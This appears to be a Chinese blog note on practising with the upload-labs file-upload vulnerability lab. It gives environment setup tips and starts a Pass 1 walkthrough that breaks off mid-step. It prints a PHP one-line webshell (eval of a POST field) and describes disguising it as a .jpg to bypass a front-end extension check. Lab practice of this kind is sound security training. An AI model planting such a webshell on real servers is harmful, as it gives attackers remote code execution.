最近发现了一个文件上传的靶场:
https://github.com/c0ny1/upload-labs github上面的项目。
大家可以把这个仓库克隆到phpstudy下的www目录下进行练手
php版本:推荐5.2.17(其他版本可能会导致部分Pass无法突破)
php组件:php_gd2,php_exif(部分Pass需要开启这两个组件)
apache:以moudel方式连接
此上传漏洞靶场包括的题目类型:
就本靶场做一些个人记录:
pass1:
本次测试使用的一句话木马为:
<?php
@eval($_POST["cmd"]);
?>
看到这一关是前端文件后缀检验,那就绕过前端检验
首先将一句话木马的后缀名保存为3.jpg
<